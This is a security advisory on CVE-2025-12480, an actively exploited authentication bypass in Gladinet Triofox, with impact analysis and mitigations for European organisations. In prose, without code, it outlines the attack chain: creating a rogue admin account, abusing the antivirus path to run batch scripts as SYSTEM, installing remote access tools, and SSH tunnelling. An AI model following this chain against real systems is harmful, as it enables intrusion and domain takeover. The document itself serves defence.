The security threat centers on a critical authentication bypass vulnerability in Gladinet's Triofox file-sharing and remote access platform, tracked as CVE-2025-12480 with a CVSS score of 9.1. This flaw permits unauthenticated attackers to access Triofox's configuration pages, enabling them to create a new native administrator account by rerunning the setup process. Once the attacker gains admin privileges, they exploit the built-in antivirus feature, which allows specifying an arbitrary path for the antivirus scanner executable. Because this antivirus process runs with SYSTEM-level privileges, attackers can point it to malicious batch scripts, effectively executing arbitrary code with the highest system privileges. The observed attack chain involves uploading a batch script named "centre_report.bat" that downloads and installs Zoho Unified Endpoint Management System components from a remote IP address. This installation facilitates deployment of remote access tools such as Zoho Assist and AnyDesk, which attackers use for reconnaissance and privilege escalation, including adding accounts to local administrators and Domain Admins groups. To evade detection, attackers establish encrypted SSH tunnels using tools like Plink and PuTTY, enabling inbound RDP connections through port 433 to maintain persistent access. This vulnerability has been actively exploited since August 2025, despite patches being released in version 16.7.10368.56560. Notably, this is the third Triofox vulnerability exploited in 2025, indicating a pattern of targeted attacks against this platform. The attackers’ ultimate objectives remain unclear but likely involve long-term access and control over compromised networks. Mandiant’s analysis highlights the need for immediate patching, auditing of admin accounts, and ensuring the antivirus feature is not misconfigured to execute unauthorized code.

For European organizations, the exploitation of this vulnerability poses significant risks including unauthorized access to sensitive files and systems, deployment of persistent remote access tools, and potential full domain compromise through privilege escalation. The ability to execute code as SYSTEM allows attackers to bypass most security controls, leading to data breaches, intellectual property theft, and disruption of business operations. The use of encrypted tunnels and legitimate remote access software complicates detection and incident response efforts. Organizations relying on Triofox for remote access or file sharing, especially in sectors with high regulatory requirements such as finance, healthcare, and critical infrastructure, face increased risks of compliance violations and reputational damage. The ongoing exploitation despite available patches suggests that unpatched or misconfigured systems remain vulnerable, increasing the attack surface across Europe. Additionally, the attackers’ capability to add users to Domain Admins groups could facilitate widespread lateral movement and persistent control over enterprise networks.

European organizations should immediately update Triofox to the latest patched version (16.7.10368.56560 or later) to remediate CVE-2025-12480. Conduct thorough audits of all Triofox administrator accounts to identify and remove any unauthorized or suspicious accounts, especially those named or resembling 'Cluster Admin'. Review and restrict the configuration of the antivirus feature within Triofox to prevent arbitrary executable paths; disable or tightly control this feature if possible. Implement network segmentation and strict firewall rules to limit Triofox server access to trusted IPs only. Monitor network traffic for unusual outbound connections, particularly SSH tunnels on port 433 and remote access tool usage. Employ endpoint detection and response (EDR) solutions to detect execution of unauthorized scripts or installation of remote access software like Zoho Assist and AnyDesk. Regularly review logs for configuration changes and new account creations in Triofox. Educate IT and security teams about this specific threat to improve detection and response capabilities. Finally, consider deploying multi-factor authentication (MFA) on Triofox admin accounts and integrate Triofox logs into centralized SIEM systems for enhanced monitoring.